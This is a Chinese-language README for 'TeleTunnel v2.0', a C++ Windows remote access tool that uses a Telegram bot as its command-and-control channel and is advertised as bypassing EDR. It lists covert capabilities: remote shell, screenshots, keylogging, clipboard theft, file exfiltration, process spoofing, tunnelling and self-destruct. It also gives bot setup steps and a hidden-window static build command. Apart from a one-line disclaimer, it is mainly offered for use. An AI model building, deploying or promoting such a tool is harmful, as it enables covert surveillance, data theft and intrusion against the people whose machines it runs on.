使用隐秘的C++ Telegram Bot以及Telegram本身作为C2接口绕过EDR!
一个基于 Telegram 的 Windows 远程访问工具。
免责声明:仅限在您拥有所有权的系统上授权使用!请 🙇
该机器人具备以下功能:
ᴛᴇʟᴇᴛᴜɴɴᴇʟ ᴠ2.0
────────────────────
👤 身份:USER@HOSTNAME
🛠 信息侦察
├── sysinfo - 完整系统报告
├── ss - 桌面截图
├── ps - 进程列表
└── ls <路径>- 目录浏览
⚡️ 命令中心
├── > <命令> - 原生 Shell
├── spawn <PID> <命令> - 伪造成执行
├── clip get/set - 剪贴板管理
└── kill - 自毁
💾 文件操作
├── get <路径> - 从主机下载
├── [拖放] - 上传到主机
└── drops - 列出上传文件($1, $LAST)
⌨️ 键盘记录
└── keylog <start|stop|dump|status>
📡 隧道
└── open|send|close|streams
────────────────────
nlohmann/json.hpp 用于 JSON 解析。该文件已包含在仓库中,省去您寻找的麻烦。获取 Telegram 机器人令牌:
@BotFather 发送消息,创建一个新机器人。获取您的 Telegram 聊天 ID:
@userinfobot 发送消息,获取您的确切用户 ID。https://api.telegram.org/bot<YOUR_BOT_TOKEN>/getUpdates,在 chat 下找到 id。配置项目:
config.h。"YOUR BOT TOKEN HERE" 替换为您的实际机器人令牌。"XXXXXXXXXX" 替换为您个人的 Telegram 用户 ID。确保您拥有所需的 Windows 库:wininet、ws2_32、gdiplus、ole32 和 iphlpapi。
使用 GCC/MinGW:
g++ -std=c++17 -O2 -mwindows -I. -Inlohmann "./TeleTunnel v2.cpp" -o TeleTunnelv2.exe -lwininet -lws2_32 -lgdiplus -lole32 -liphlpapi -static -static-libgcc -static-libstdc++